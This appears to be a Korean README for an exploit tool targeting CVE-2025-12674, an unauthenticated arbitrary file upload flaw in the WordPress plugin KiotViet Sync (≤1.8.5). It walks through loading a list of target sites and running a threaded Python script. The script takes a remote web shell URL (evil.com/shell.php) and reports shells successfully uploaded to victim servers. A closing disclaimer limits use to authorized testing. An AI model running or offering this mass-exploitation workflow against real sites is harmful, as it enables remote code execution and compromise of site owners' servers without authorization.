
KiotViet Sync <= 1.8.5 - 인증되지 않은 임의 파일 업로드
KiotViet Sync <= 1.8.5 - 인증되지 않은 임의 파일 업로드
WordPress용 KiotViet Sync 플러그인(버전 1.8.5까지 포함)은 create_media() 함수에서 파일 형식 검증이 누락되어 임의 파일 업로드에 취약합니다.
이 취약점으로 인해 인증되지 않은 공격자가 서버에 임의 파일을 업로드할 수 있으며, 이는 원격 코드 실행으로 이어질 수 있습니다.
이 저장소를 클론하거나 스크립트를 다운로드하세요.
대상 준비:
list.txt 파일에 한 줄에 하나의 대상을 입력하세요.
example.com
site2.com
http://site3.com
익스플로잇 스크립트 실행:
스크립트 이름은:
CVE-2025-12674.py
python3 CVE-2025-12674.py
프롬프트가 나타나면 옵션을 입력하세요:
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt에 저장됩니다.이 스크립트는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
소유하지 않거나 테스트 권한이 명시적으로 부여되지 않은 시스템에 대한 무단 사용은 불법적이며 비윤리적입니다.
저자는 오용 또는 발생한 모든 손해에 대해 책임을 지지 않습니다.
Nxploited (Khaled Alenazi)